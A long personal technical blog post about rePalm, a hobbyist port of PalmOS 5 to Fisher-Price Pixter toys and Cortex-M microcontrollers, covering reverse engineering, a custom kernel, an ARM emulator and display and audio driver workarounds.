But OK, back to my favourite game. Since ARM code execution is unimpeded by PC [bit 1], the faulty code crashes after an arbitrary delay following PC [bit 1] being set, or maybe does not crash at all, but malfunctions. If I had alignment checking, I could detect the most likely cause of crash (unaligned literal load) and fix it. Lacking that, what could I do? I decided on a complex, partial, and heuristic-full solution. To call into ARM-native code, PalmOS applications use an OsCall called PceNativeCall . It gets a function pointer to jump to in native ARM mode, and a parameter to pass to the code. I patched this function with my own wrapper that does the following: First, determine which memory heap the code pointer is in. Second, manually walk the heap structures to find which memory chunk the pointer is in. Third, assume that the entire memory chunk is ARM code and apply the heuristic to it. The heurostic produces no false positives or negatives across all the games I tested, so I am satisfied with it. It is this: (1) A valid thumb BL at a proper 2-byte boundary pointing to somehwere inside the chunk at a 2 but not 4 byte boundary, (2) A BX PC at that location, (3) The BX PC is followed by a valid ARM B with a target somewhere inside the chunk, and (4) The target instruction is unconditional, making it a likely first instruction in a valid function.

OK, so, say I find the problematic BX PC . What now? It is not like I can fix it. To fix it requires two bytes of extra space that I do not have, and editing of all the callsites. Instead, I simply replace the BX PC with an invalid instruction in a special format. My kernel has a handler for the invalid instruction trap that checks for Thumb-mode execution of that exact instruction. It will correctly adjust PC and return in ARM mode to the ARM B instruction, allowing it to continue with PC [bit 1] properly cleared. This does mean that (1) I am editing the game binary in RAM and some game might detect this and get upset, and (2) depending on how often this callsite is called, a whole lot of exceptions might be being taken, costing a lot of performance. The first case is simple - seemingly no games get upset because usually they do self-checking before calling the code. The second case is addressed by making the handler as simple and light as possible, minimizing the penalty. This is the best I can do, and it works! Since the issue is found in the ARM7TDMI core, I named by hack to work around it LEG7IMDT , of course.

Pixter Multimedia

The last generation of Pixter was the "Pixter Multimedia". This one was even fancier - it had some buttons (a directional pad and A/B buttons) and a better SoC: Sharp LH79524 . It also supported some fancier multimedia game carts, some featuring rudimentary video playback. Inside, it sported a real DAC ( TLV320DAC26), connected by I2S to the SoC. There was also 4 whole megabytes of SDRAM in the device. Up front, and most noticeable of all, was the TFT screen. Still 160x160 but now with a better contrast ratio than the Pixter Color's STN screen's 1:2. Of course I wanted to support this one as well. What would that take?

The SoC uses the same ARM7 core, but now in much better configuration: it now had an MMU and 8KB of cache. The TCM is gone, however. This is a worthy trade. With an MMU, a number of things get better: NULL pointers can be caught, real memory protection is possible for the storage heap, and a simpler solution to the ARM7 quirks might be possible instead of LEG7IMDT . With a cache, much of the memory latency can be hidden for tasks with a small working set. Overall this device performs significantly beter!

Audio support was actually rather simple. Once I figured out how the SPI interface of the codec was wired to the SoC (it was bit-banged using some GPIOs), it was simply a matter of configuring the DMA for the data and configuring the DAC for the proper sample rate. I made it build-time-configurable in the source, but settled on 44.1KHz - a perfectly good sample rate. The codec supports driving a single speaker (as is present in the Pixter Multimedia) or a set of headphones in glorious full stereo. As I designed rePalm to make supporting new hardware easy, it took only a few hours of work to hook up audio support and hear it work. This device is fast enough to play uncompressed audio and even do so while a game is running, making playing Warfare, Inc even more fun, with the units calling out "on my way, sir!" when you direct them somewhere. Same as in Pixter Color, I hooked up the battery sense to the OS (here the scale was 0.27). There is also a volume knob on the side of Pixter Multimedia. As the DAC has no analog "gain" inpuit, I was not quite sure where it could possibly be hooked up to work. The mystery was solved after some investigation. It is an analog input to the SoC's ADC, nothing more. It is up to software to do anything with this information. I decided to save this for later, but maybe I'll convert it to a jog-wheel-like thing. Anyways, simple game soundbites and uncompressed audio were not the extent of my aspirations -- I wanted real MP3 playback from SD card to work!

Everything I said about SD card support on Pixter Color still held here - I was bit-banging SPI to talk to the card. The SoC in Pixter Multimedia had a different clock tree, and I played around with a lot of options, finally settling on a rather significant CPU overcock of 102MHz (documented max is 75MHz) while keeping the AHB speed at 51MHz. This provided stability and just barely enough cycles to decode mono 96Kbps MP3s. Higher clock rates allow higher quality music, but not all tested Pixter Multimedia units could clock higher than 110MHz.

Pixter Multimedia display proved to be a pain point, however. It is indeed 160x160, but for some reason stock Pixter software was configuring it for 162x160. It took me very little time to figure out why - the display eats the first two columns of data. This is despite any configuration change. It does not mater if you adjust the HBP or HFP or HSYNC length. Unfortunately, losing the FIRST pixels of a row is very very bad for us! Why? Many parts of PalmOS, assume that every display line begins at a 2-byte boundary. My blitter does as well, for efficiency. There is no assumption that every line follows the previous one in memory, so in theory we can simply have a 160x160 display with a 162x160 framebuffer in memory, and claim that the framebuffer starts 2 pixels in. Will it work? Let's math! SoC hardware forces the display data to start at a 4-byte boundary. At 16bpp, two pixels are 4 bytes, so an address two bytes into a line is 4-byte aligned -- a superset of being 2 bytes aligned. Good. At 8bpp, two pixels are 2 bytes, so an address two bytes into a line is 2-byte aligned - good enough. Things begin to fall apart at 4bpp and below. At 4 bpp, two pixels are a single byte and the blitter will be quite unhappy at a line not starting at a two byte boundary. At 2 and 1 bpp, the line does not even start at a byte boundary. No good! What could I do?

Had I had no MMU, the game would be over right there, but I did have one! I decided to do the same thing I had done before for another reason. The short of it is: create a fake framebuffer, aligned as the OS wants it. Protect it using the MMU. Anytime a write is attempted, take a fault, unprotect it, and start a 60Hz timer to convert the data to the proper format and alignment and transfer to the real framebuffer. After a few such copies, re-protect the original framebuffer and disable the timer. In turn, that allows for fast refreshes while drawing is ongoing and allows us to stop the CPU waste when this is no longer needed. This allows for 1/2/4bpp modes to work and only wastes CPU on drawing when actual drawing is ongoing. I wrote the transfer funcs in assembly for speed. This also allows us to use 16bpp mode. You'll recall that I mentioned that these Sharp SoCs use the idiotic XRGB1555 mode, while PalmOS needs and assumes the common-and-sane RGB565. Well, now that I had an ability to "convert" data on each draw, why not support 16bpp as well? I did and it is glorious! Photo-viewing apps worked now, even if only using 32768 colors

As foreshadowed earlier, LEG7IMDT is not needed on Pixter Multimedia. Any sane code ruunning with PC [bit 1] set would either run fine to completion or hit an alignment fault when it attempted to load an immediate from the literal pool. My aligment fault handler simply checks if the CPU was in ARM mode with PC [bit 1] set, clears it, and returns. If this fixes the issue - good. If not, we trap again and this time it is fatal since the PC [bit 1] being set was clearly not the issue. This is indeed simpler than walking memory heaps and patching random executables live.

Some More Pixter Polish

Pixter Multimedia showing a simple white message on black background that it is the wrong device to boot this cart

Since both Pixter Color and Pixter Multimedia use the same cart slot, the same cart can be used in both, hardware-wise. But since rePalm kernel builds rather differently for MMU and MMU-less systems, I did not want to try to make a universal build. Instead, you can use the self-update mechanism to flash one of the two images to switch between them. Of course, if you only have a Pixter Color, you woud not want to flash the Pixter Multimedia image since you'd then be unable to boot to flash back. I did want to be a bit more user-friendly. Luckily, long ago I added a capability to run some code very early in rePalm boot. On Pixter, I used it to check the SoC type before boot. What good is that? If it does not match the current build, I can use rePalm's simple fixed-width character renderer on the framebuffer still enabled from Pixter's OS's boot and show a message. Here you can see what it looks like.

At some point during the project, I saw a weird Pixter Color. It seemed to have a much better screen than others. It also did not boot my Pixter Color image. To be more precise, it bootead fine, based on the serial console, but the display was off. Some investigation revealed that there was a small production run of Pixter Color device with the Pixter Multimedia's TFT screen. I changed my code to detect screen type (based on how Pixter's OS had set it up) and handle both. The good news is that the TFT display on Pixter Color can display the full 4096 color-palette that 12 bits per pixel would allow, rather than the 3375 colors the STN could. There was bad news too, though. Being the same display as Pixter Multimedia, it still ate the first two columns of pixels. Pixter Color had not yet sprouted an MMU so my old tricks would not work. Initially I simply disabled 1/2/4 bpp modes. This did not seem to break any applications, but it confused many since very few actually check for errors when they call WinScreenMode to set screen depth. I decided that a low-performing solution is better than one that confuses apps, so I added a 60Hz interrupt that copies the data in the proper format from a fake framebuffer to a real one. Basically, this is the same as what I did for Pixter Multimedia, but without the ability to stop doing it when the display stops being changed by the app. I'd estimate the performance cost of this to be around 20% of Pixter Color's CPU budget. Luckily, when running at 8bpp, this is not an issue. I then did the same thing to enable 16bpp on both the STN and TFT displays. The cost is immense (30% CPU on TFT, 46% on STN due to needing to apply STN correction curves). Due to this I have the device boot in 8bpp mode which has color and peforms well, but if any app requests 16bpp, it is available. After some more thought about how cruel it is to steal 46% of an already slow CPU, I changed this to a 30Hz interrupt, halving the cost.

Pixter Multimedia showing the 'Buttons' control panel with cons matchng Pixter's silkscreened buttons

I wanted to make a good use of ALL the silkscreened buttons under the display, not just the three I had assigned before. I mapped them all to a purpose, and even took the time to draw pixel-perfect icons for them to integrate into the Buttons Prefs Panel on both devices. The mapping is the same on both devices, even though the button spacing is not the same and required individual silkscreen resource files. The first button toggles on-screen writing, the next 4 act like the normal application buttons on palm devices. The next one (that looks like an explosion) opens the menu. The one after that, which looks like a magic wand, opens the contrast adjustment dialog. Why? Original Pixter OS used it for that and I desired some consistency. The one after (folder) brings up the find dialog. And, of course, the home icon opens the app launcher. Overall sane, I think.

Pixter Results

This is the first primary-battery-powered color PalmOS device. This is the first primary-battery-powered PalmOS 5 device. Pixter Color is also the worst-performing PalmOS device ever. But it does work... There are a lot of photos and videos in the rePalm photo album linked-to on top of this page.

I did some benchmarks and found that Pixter Multimedia performs aproximately on par with Palm Tungsten T. Pixer Color ... looks cute trying, but the benchmark results are comical -- it is 6% as fast as a T|T. But for basic PIM and many games this is plenty. Warfare Inc works! What more could you ask for? To download the latest update images, click here . You can use them to flash boards you make or to update boards you got from me.

Nov 2, 2025 - summary of what you missed

I have made builds for Pimoroni Presto, the DEFCON32 badge, and worked on PalmCard - a replacement memory card for Palm Pilot classic that uses RP2040 to run rePalm and makes a terminal out of the Palm. Lately I've been working on supporting Fisher-Price Pixter Color. All of this can be seen in the photo album. Future updates will be more detailed, but I am too lazy to write about the last few years of development here since it really was mostly just new device support and bug fixes. Soeone who is not me also did some work on rePalm - there is now a working nintendo DS port. I helped only a little, most of the work was not mine, and this is awesome!

The original article about the start of the project

PalmOS Architecture (and a bit of history)

History

PalmOS before 5.4 kept all data in RAM in databases. They came in two types: record databases (what you'd imagine it to be) and resource databases (similar to MacOS classic resources). Each database had a type and a creator ID, each a 32-bit integer, customarily with each 8-bit piece being an ascii char. Most commonly any application would create databases with their creator ID set to its. Certain types also had meaning, like for example appl was an appliction and panl was a preference panel.

PalmOS started out on Motorola 68k processors and ran on them from first development all the way to version 4.x. For version 5, Palm Inc chose to switch to ARM processors, as they allowed a lot more speed (which is always a plus). But what to do about all the software? Lots of PalmOS apps were written for OS 4.x and compiled for m68k processor. Palm Inc introduced PACE - Palm Application Compatibility Extension. PACE intercepted the OsCall SysAppLaunch (and a number of others) and emulated m68k processor, allowing all the old software to run. When m68k apps called an OsCall, PACE would translate the parameters and call the ARM Native OsCall. This meant that while the app's logic was running in emulation, all OsCalls were native ARM and fast. Combine this with the fact that PalmOS 4.x devices usually ran at 33MHz, and PalmOS 5.x devices usually ran at hundreds, there was almost no slowdown, most old apps compiled for PalmOS 4.x ran at a perfectly good speed. It was even good enough for Palm Inc, since most built-in apps (like calendar and contacts were still m68k apps, not ARM). There was also PalmOS 6.x (Cobalt) but it never really saw the light of day and is beyond the scope of this document.

Palm Inc never documented how to write full Native ARM applications on PalmOS 5.x. It as possible, but not documented. The best official way to get the full speed of the new ARM processors was to use the OsCall PceNativeCall to jump into a small bit of native ARM code that Palm Inc called "ARMlet"s and later "PNOlet"s. Palm said that only the hottest pieces of code should be treated this way, and it was rather hard to call OsCalls from these bits of native ARM code (you had to call back into PACE , which would marshal the parameters for the native API, and then call it. The ways to call the real Native OsCalls were also not documented.

PalmOS 5.x kept a lot of the design of PalmOS 4.x, including the shared heap, lack of protected memory, and lack of proper documented multithreading. A new thing was that PalmOS 5.x supported loadable modules. In fact, every Native ARM application or library in PalmOS 5.x is a module. Each module has a module ID, which is required to be system-unique and exist in the range of 0..1023. This is probably why Palm Inc never documented how to produce full Native applications - they could never allow more than 1024 of them to exist.

PalmOS licensees (sony, handspring, etc) got the sources to the OS and all of this knowledge of course. They were able to customize the OS as needed and then shipped it, but the architecture was always mostly the same. This also aids us a lot.

Modules? Libraries? DALs? Drivers?

The kernel of the OS, memory management, most of the drivers, and low level CPU wrangling is done by the DAL . DAL (Module ID 0) exports about 200 OsCalls, give or take based on the PalmOS version. These are low level things like getting battery state, raw access to screen drawing primitives, module loading and unloading, memory map management, interrupt management, etc. Basically these are functions that no user-facing app would ever need to use. On top of the DAL lives Boot . Boot (Module ID 1) provides a lot of the lower-level user-facing OsCalls. Implemented here are things like the DataManager, MemoryManager, AlarmManager, ExchangeManager, BitmapManager, and WindowManager. Feel free to refer to the PalmOS SDK for details on all of those. On top of Boot lives UI . UI (Module ID 2) provides all of the UI primites to the user. These are things like controls (buttons, sliders, etc), forms, menus, tables, and so on. These three modules together make up the core of PalmOS. You could, in fact, almost boot a ROM containing just these three files.

These first three modules are actually somewhat special, being the core of the OS. They are always loaded, and their exported functions are always accessible via a special shortcut. For modules 0, 1, and 2, you can call an exported function number N by executing these two instructions: LDR R12, [R9, #-4 * (module_ID + 1)]; LDR PC, [R12, #4 * func_no] . This shortcut exists for easy calls to OsCalls by native modules and only works because these modules are always loaded. This is not a general rule, and this will NOT work for any other modules. You might ask if one can also write to these tables of function pointers to replace them. Yes, yes you can and this was often done by what were called "hacks" and also is liberally used by the OS itself (but not via direct writes but via an OsCall: SysPatchEntry ).

PalmOS lacks any memory protection, any user code can access hardware. PalmOS actually uses this - things like SD card drivers, and drivers for other peripherals are usually separate modules and not part of the DAL . The Boot module will load all PalmOS resource databases of certain types at boot, allowing them to initialize. An incomplete list of these types is: libs (slot driver), libf (filesystem driver), vdrv (serial port driver), aext (system extension), aexo (OEM extension). These things being separate is actually very convenient, since that means that they can be easily removed/replaced. There are of course corner cases, since PalmOS developers never anticipated this. For example, if NO serial drivers are loaded, the OS will crash as it never expected this. Luckily, this is also easy to work around.

Anytime a module is loaded, the entry point is called with a special code, and the module is free to initialize, set up hardware, etc. When it is unloaded, it gets another code, and can deinitialize. There is another special code modules can get and that is from PACE . If you remember, I said that PACE marshals parameters from m68k apps to OsCalls and back, but PACE cannot possibly know about parameters that a random native library takes, so the marshalling there must be done by the library itself. This special code is used to tell the library to: read parameters from the m68k emulated stack, process them, and put the result unto the emulated m68k registers ( PACE exports functions to actually manage the emulated state, so the libraries do not need to know of its insides).

Towards the first unauthorized PalmOS port

So what's so hard?

As I mentioned, none of the native API of PalmOS 5.x was ever documented. There was a small number of people who figured out some parts of it, but nobody really got it all, or even close to it. To start with, because large parts are not useful to an app developer, and thus attracted no interest. This is a problem, however, if one wants to make a new device. So I had to actually do a lot of reverse engineering for this project - a lot of boring reverse engineering of very boring APIs that I still had to implement. Oh, and I needed a kernel, and actual hardware to run on.

ROM formats are hard

To start with, I wrote a tool to split apart and put back together working PalmOS ROM images. The format is rather convoluted, and changed between versions, but after a lot of work the "splitrom" tool can now successfully split a PalmOS ROM from pre-release pre-v.1.0 PalmOS devices all the way to the PalmOS 6.0 cobalt ROMs. The "mkrom" tool can now produce valid PalmOS 5.x images - I never bothered to actually make it produce other versions as I did not need it. At this point I took a detour from the project to collect PalmOS ROMs. I now have one from almost every device and prototype. I'll share them with the world later. I tested this by pulling apart a T|T3 ROM, replacing some files, putting it back together, and reflashing my T|T3. It booted! Cool!

So write a DAL and you're done!

I had no hardware to test on, no kernel to use, and a lot more "maybe"s than I was willing to live with, so it was time for action. The quickest way I could think of to try it was to use a real ARM processor and an existing kernel - linux. Since my desktop uses an x86 processor and not ARM, qemu was used. I wrote a basic rudimentary DAL that simply logged any function called and then crashed on purpose. At boot, it did same as PalmOS's DAL does: load Boot and in a new thread call PalmOSMain OsCall. I then wrote a simple "runner" app that used mmap() to map an area of memory at a particular location backed by "rom.bin" and another by "ram.bin" and tried to boot it. I got some logged messages and a crash, as expected. Cool! I guess the concept could work. So, what is the minimum number of functions my DAL needs to boot? Turns out that most of them! Sad day...

Minimal DAL

It took months, but I got most of the DAL implemented, and it ran inside my "runner" inside qemu. It was a very scary setup. Since it was all a userspace app under Linux, I had to call back out to the "runner" to request things like thread creation, etc. It was a mess. Current rePalm code still supports this mode, but I do not expect to use it much, for a variety of reasons. To start with, Linux kernel lacks some API that PalmOS simply needs, for example ability to disable and re-enable task switching. Yup... PalmOS sometimes asks for preemption to be disabled. Linux lacks that ability. PalmOS also needs ability to remotely pause and resume a thread, without the thread's consent. The pthreads library lacks such ability as well. I hacked together some hacks using ptrace, but it was a mess. Fun story: since my machine is multi-core, and I never set any affinities, this was the first time ever that PalmOS ran on a multi-core device. I did not realize it till much later, but that is kind of cool, no?

Drawing is hard

There was one problem. For some reason, things like drawing line, rectangles, circles, and bitmaps were all part of the DAL . Now, it is not hard to draw a line, but things like "draw a rounded rectangle with foreground color of X and a background color of Y, using drawing mode 'mask' on this canvas" or "draw this compresed 16-bit full-color 144ppi image on this 4-bits-per-pixel 108ppi canvas with dithering, respecting transparency colors, and using 'invert' mode" or even "print string 'Preferences' with background color X, foreground Y, text color Z, dotted-underlined, using this low-density font on this 1.5 density canvas" get convoluted quickly. And yes, the DAL is expected to handle this all. Oh, and none of this was ever documented of course! This was a nightmare. At first I treated all drawing functions as NOPs and just logged the drawn text to know how far my boot has gotten. This allowed me to implement many of the other OsCalls that DAL must provide, but eventually I had to face having to draw. My first approach was to just implement things myself, based on function names and some reverse engineering. This approach failed quickly - the matrix of possibilities was simply too large. There are 8 drawing modes, 3 supported densities, 4 image compression formats, 5 supported color depths, and two font formats. It was not possible to think of everything, especially with no way to be sure I had it right. I am not sure if some of these modes ever got exercised by any software in existence at all, but it did not matter - it had to be pixel exact! What to do?

Theft is a form of flattery, right?

I decided on a stopgap measure. I disassembled the Zire72 DAL . And I copied each of the necessary functions, and all the functions they called, and all of the functions those functions called, and so on. I then cleaned up their direct references to Zire DAL 's globals, and to each other, and I stuck it all into a giant "drawing.S" file. It was over 30,000 lines long, and I mostly had no idea how it worked. Or if it worked...

It did! Not right away, of course, but it did. Colors were messed up, artifacts everywhere, but I saw the touchscreen calibration screen after boot! Success, yes? Well, not even remotely. To start with, it turns out that in the interest of optimization, PalmOS's drawing code happily sticks its fingers into the display driver's globals. My display "driver" at this point was just an area of memory backed by an SDL surface. It took a lot of work (throwaway work - the worst kind) to figure out what it was looking for and give it to it. But after a few more weeks, Zire72's DAL 's drawing code happily ran under rePalm and I was able to see things drawn correctly. After hooking up rudimentary fake touchscreen support, I was even able to interact with the virtual device and see the home screen. Great, but this was all a waste. I do not own that code and cannot ship it. I also cannot improve it, expand it, fix it, or even claim to entirely understand it. This was not a path forward.

Meticulously-performed imitation is also a form of flattery, no?

The time had come. I rewrote the drawing code. Function by function. Line by line. Assembly statement by assembly statement. I tested it after replacing every function as best as I could. Along the way I gained the understanding of how PalmOS draws, what shortcuts for what common cases there are, etc. This effort took two months, after them, 30,000 lines of uncommented assembly turned into 8,000 lines of C. rePalm finally was once again purely my own code! Along the way I optimized a few things and added support for one-and-a-half density, something that the Zire72 DAL never supported. Of all the parts of this project, this was the hardest to slog through, because at the end of every function decoded, understood, and rewritten, there was no noticeable movement forward - the goal was just to not break anything, and there were always dozens of thousands of lines of code to disasemble, understand, and rewrite in C.

Virtual SD card

For testing it would be convenient to be able to load programs easier into the device than baking them into the ROM. I wrote a custom slot driver that did nothing, but only allowed you to use my custom filesystem. That filesystem used hypercalls to reach code in the "runner" to perform filesystem ops on the host. Basically this created a shared folder between my PC and rePalm . I used this to verify that most software and games worked as expected

Which device ROM are you using?

ANY! I tested pre-production Tungsten T image, I tested LifeDrive image, even Sony TH55 ROM boots! Yes, there were custom per-device and per-OS-version tweaks, but I was able to get them to apply automatically at runtime. For example, determining which OS version is running is easily done by examining the number of exported entrypoints of Boot . And determining if the ROM is a Sony device is easy by looking for SonyDAL module. We then refuse to load it, and fake-export equivalent functions ourselves. Why does the DAL need to know the OS version? Some DAL entrypoints changed between PalmOS 5.0 and PalmOS 5.2, and PalmOS 5.4 or later expect a few extra behaviours out of existing funcs that we need to support.

So you're done, right? It works?

At this point, rePalm sort of worked. It was a window on my desktop that ran REAL UNMODIFIED PalmOS with only a single file in the ROM replaced - the DAL . Time to call it done, and pick a new project, right? Well, not quite. Like I said, Linux was not an ideal kernel for this, and making a slightly-more-open PalmOS simulator was not my goal. I wanted to make a device...

Towards the first pirate PalmOS device

A little bit about normal PalmOS 5.x devices, their CPUs, and the progress since...

In order to understand the difficulties I faced, it is necessary to explain some more about how PalmOS 5.x devices usually worked. PalmOS 5.x targetted ARMv4T or ARMv5 CPUs. They had 4-32MB of flash or ROM to contain the ROM, and 8-128MB or RAM for runtime allocations and data storage. PalmOS 5.4 added NVFS, which I shall for now pretend does not exist (as we all wished we could when NVFS first came out). ARMv4T and ARMv5 CPUs implement two separate instruction sets: ARM and Thumb. ARM instructions are each exactly 4 bytes, and are the original instruction set for ARM CPUs. Thumb was added in v4T as a method of improving code density. It is a set of 2-byte long instructions that implement the most common operations the code might want to do, and by being half the size improve code density. Obviously, you do not get something for nothing. In the CPUs back then, Thumb instructions had one extra pipeline stage, so this caused them to be slower in code with a lot of jumps. Also, as the instructions themselves were simpler, sometimes it took more of them to do the same thing. Thumb instructions, in most cases, also only have access to half as many registers as ARM instructions, further leading to slightly less optimal code. But, in general Thumb code was smaller, and speed was not a factor, so large parts of PalmOS were compiled in Thumb mode. (Sony bucks this trend, having splurged for larger flash chips and compiling the entire OS in ARM mode). Some things could also not at all be done in Thumb, for example, 32x32->64 bit multiply, and some were very suboptimal to do in Thumb (like a lot of the drawing code with a lot of complex bit shifts and addressing). These speed-critical pieces were always compiled in ARM mode in PalmOS. Also all library entry points were always in ARM mode with no other options, so even libraries entirely compiled as Thumb, had small thunks from ARM to Thumb mode on each entrypoint.

How does one actually switch modes between ARM and Thumb in ARMv5? Certain, but not all, instructions that change control flow perform the change. Since all ARM instructions are 4-bytes long and always aligned on a 4-byte boundary, any valid ARM instruction's address has the low two bits cleared. Thumb instructions are 2 bytes long, and thus have the bottom one bit cleared. 32-bit-long Thumb2 instructions are also aligned on a 2-byte boundary. This means that for any instruction in any mode, the lower bit of its address is always clear. ARM used this fact for mode switching. The BX instruction would now look at the bottom bit of the register you're jumping to, and if it was 1, treat the destination as Thumb, else as ARM. Any instruction that loads PC with a word will do the same: POP , LDM , LDR instructions. Arithmetic done on PC in Thumb mode does not change to ARM mode ever (low bit ignored) and arithmetic done on PC in ARM mode is undefined if the lower 2 bits produced are nonzero ( CAUTION : this is one of the things that ARMv7 changed: this now has defined behaviour). Also an extra instruction was added for easy calls between modes: BLX . There is a form of it that takes a relative offset encoded in the instruction itself, which basically acts like a BL , but also switches modes to whatever NOT the current mode is. There is also a register mode of it that combines what a BX does with saving the return address. Of course to make sure that returns to Thumb mode work as expected, Thumb instructions that save a return address, namely BL and BLX set the lower bit of LR .

ARMv5 at this point in time is ancient history. ARM architecture is up to v8.x by now, with 64-bit-wide-registers and a completely different instruction set. ARMv7 is still often seen around (v8 can also run in v7 mode) and is actually an almost perfect (but actually not entirely so) superset of ARMv5. So I could basically take a dev board for any ARMv7 chip, which are abundant and cheap, and use that as my base, right? Technically yes, but I did not go this way. To start with, few of these CPUs are documented well, so unless you use linux kernel, you'll never get them up - writing your own kernel and drivers for them is not feasible (I am looking at you, allwinner). "But," you might object, "what about Raspberry Pi, isn't its CPU fully documented?" I considered it, but discarded the idea - RasPi is terribly unstable, and I had no desire to build on such a shaky platform. Launch firefox on your RasPi, open dailymail or some other complex site, and go away, come back in 2 weeks, I guarantee you'll be greeted by a hung screen and a kernel panic on the serial console. If even Linux kernel developers cannot make this thing work stably, I had no desire to try. No thanks. So what then?

ARMv7M

The other option was to use a microcontroller - they are plentiful, documented, cheap, and available. ARM designs and sells a large number of small cores under the Cortex brand. Cortex-M0/M0+/M1 are cores based on the ARMv6M spec - basically they run the same Thumb instruction set that ARMv5 CPUs did, with a few extra instructions to allow them to manage privileged state ( MRS / MSR / CPS ). Cortex-M23 is their successor, which adds a few extra instructions ( DIV / CBZ / CBNZ / MOVW / MOVT / B.W ) which makes it a bit less of a pain in the ass, but it still is very much a pain for complex work. Cortex-M3/M4/M7 implement ARMv7M spec, which has a very expanded Thumb2 instruction set. It is the same instruction set that ARM introduced into the ARM cores back in the day with ARMv6T2 architecture CPUs. These instructions are a mix of 2 and 4-byte long pieces and are actually pretty good for complex code, supporting long multiplies, complex control flow, and bitfield operations. They can also address all registers and not just half of them like the Thumb instruction set of yore. Cortex-M33 is the successor to these, adding a few more things we do not currently care about. Optionally, these cores can also include an FPU for hardware floating point support. We also do not care about that. There is only one problem: None of these CPUs support ARM instuctions . They all only run Thumb/Thumb2. This means we can run most of PalmOS's Boot and UI , but many other things will fail. Not acceptable. Well, actually, since every library has to be entered in ARM mode, nothing will run...

My kingdom for an ARM!

It is at this point that I decided to extend PalmOS's module format to support direct entry into Thumb mode and converted my DAL to this now format. I also taught my module loader to understand when an library's entry point points to a simple ARM-to-Thumb thunk, and to resolve this directly. This allowed an almost complete boot without needing ARM. But this was not a solution. Large parts of the OS were still in ARM mode (things like MemMove , MemCmp , division routines), and if the goal was to run an unmodified OS and apps, editing everything everywhere was not an option. Some things we could just patch via SysPatchEntry . This I did to the abovementioned MemMove and MemCmp for speed, providing optimal Thumb2 implementations. Other things I could do nothing about - things like integer division (which ARMv5 has no instruction for) were scattered in almost every library, and could not be patched away as they were not exported. We really did need something that ran ARM instructions.

But what if we try?

What exactly will happen if we try to switch an ARMv7M microcontroller into ARM mode? The manual luckily is very clear on that. It WILL switch, clear the status bit that indicated we're in Thumb mode, and then when it tries to execute the next instruction, it will take a UsageFault since it cannot execute in this mode. The Thumb BLX instruction of the form that always switches modes is undefined in ARMv7M, and if executed, the CPU will take a UsageFault as well, indicating in invalid instruction. This all sounds grim, but this is actually fantastic news! We can catch a UsageFault ... If you see where I am going with this, and are appropriately horrified, thanks for paying attention! We'll come back to this story arc later, to give everyone a chance to catch up.

We need hardware, but developing on hardware is ... hard

CortexEmu to the rescue

I thought I could make this all work on a Cortex-M class chip, but I did not want to develop on one - too slow and painful. I also did not find any good emulators for Cortex-M class chips. At this point, I took a two-week-long break from this project to write CortexEmu. It is a fully functional Cortex-M0/M3/M23 emulator that faithfully emulates real Cortex hardware. It has a GDB stub so I can attach GDB to it to debug the running code, It has rudimentary hardware emulated to show a screen, and support an RTC, a console, and a touchscreen. It supports privileged and unprivileged mode, and emulates the memory protection unit (MPU) as well. CortexEmu remains the best way to develop rePalm .

Waaaah! You promised real hardware

Yes, yes, we'll get to that, and a lot more later, but that is still months later in the story, so be patient!

Um, but now we need a kernel...

Need a kernel? Why not Linux?

PalmOS needs a kernel with a particular set of primitives. We already discussed some (but definitely not all) reasons why Linux is a terrible choice. Add to that the fact that Cortex-M3 compatible linux is slow AND huge, it was simply not an option. So, what is?

I ended up writing my own kernel. It is simple, and works well. It will run on any Cortex-M class CPU, supports multithreading with priorities, precise timers, mutexes, semaphores, event groups, mailboxes, and all the primitives PalmOS wants like ability to force-pause threads, and ability to disable task switching. It also takes advantage of the MPU to add some basic safety like stack guards. Also, there is great (& fast) support for thread local storage, which comes in handy later. Why write my own kernel, aren't there enough out there? None of the ones out there really had the primitives I needed and bolting them on would take just as long.

So, uh, what about all that pesky ARM code?

The ARM code still was a problem

PalmOS still would not boot all the way to UI because of the ARM code. But, if you remember, as few paragraphs ago I pointed out that we can trap attempts to get into ARM mode. I wrote a UsageFault handler that did that, and then...I emulated it

You do not mean...?

Oh, but I do. I wrote an ARM emulator that would read each instruction and execute it, until the code exited ARM mode, at which point I'd exit the emulation and resume native execution. The actual details of how this works are interesting since the emulator needs its own stack and cannot run on the stack of the emulated code. There also needs to be a place to stash the emulated registers since we cannot just keep them in the real registers (not enough registers for both). Exiting emulation is also kind of fun since you need to load ALL register and status register as well all at once atomically. Not actually trivial on Cortex-M. Well, in any case, "emu.c" and "emuC.c" have the code - go wild and explore.

But isn't writing an emulator in C kind of slow?

You have no idea! The emulator was slow. I instrumented CortexEmu to count cycles, and came up with an average of 170 cycles of host CPU to emulate a single ARM instruction. Not good enough. Not even remotely. It is well known that emulators written in C are slow. C compilers kind of suck at optimizing emulator code. So what next? Well, I went ahead and rewrote the emulator core in assembly. Actually I did it twice. Once for ARMv7M (Cortex-M3 target) and once for ARMv6M (Cortex-M0 target). The speed improved a lot. Now for the M3 core I was averaging 14 cycles per cycle, and for the M0 it was 19. A very respectable emulator performance if I do say so myself.

So, is it fast enough now?

As mentioned before, on original PalmOS devices, ARM code was generally faster than Thumb, so most of the hottest, tightest, fastest code was written in ARM. For us, ARM is 14x slower than Thumb. So the code that was meant to be fastest is slow. But let us take an inventory of this code and see what it really is. Division routines are part of it. ARMv7M implements division in hardware, but ARMv5 did not (nor does ARMv6M). These routines are a hundred cycles or so in ARM mode. MemMove , MemMSet and MemCmp We spoke about already, and we do not care because we replaced them, but lots of libraries had their own internal copies we cannot replace. My guess is that the compiler prefers to inline its own "memset" and "memcpy" in most cases. That made up a large part of the boot process's ARM code usage. Luckily, all of these functions are the same everywhere...

So, can we pattern-match some of these in the emulator code and execute faster native routines? I did this and boot process did go faster. The average per-instr overhead rose due to matching, but boot time shrank. Cool. But what happens after boot? After boot we meet the real monster... PACE 's m68k emulator is written in ARM. 60 kilobytes of what is clearly hand-written assembly with lots of clever tricks. Clever tricks suck when you're stuck emulating them... So this means that every single m68k application (which is most of them) is now running under double emulation. Gross... Oh, also: slow. Something had to be done. I considered rewriting PACE , but that is a poor solution - there are a lot of ARM libraries and I cannot rewrite them all. Plus, in what way can I claim to be running an unmodified OS if I replace every bit of it?

There is one more way to make non-native code fast...

You do not mean...? (pt2)

Just in time: this

PACE contains a lot of hot code that is static. On real devices it lives in ROM and does not change. Most libraries are the same. So, what can we do to make it run faster? Translate it to what we can run natively, of course. Most people would not take on a task of writing a just-in-time translator alone. But that is just because they are wimps :) (Or maybe they reasonably assume that it is a huge time sink with more corner cases than one could shake a stick at)

JITs: how do we start?

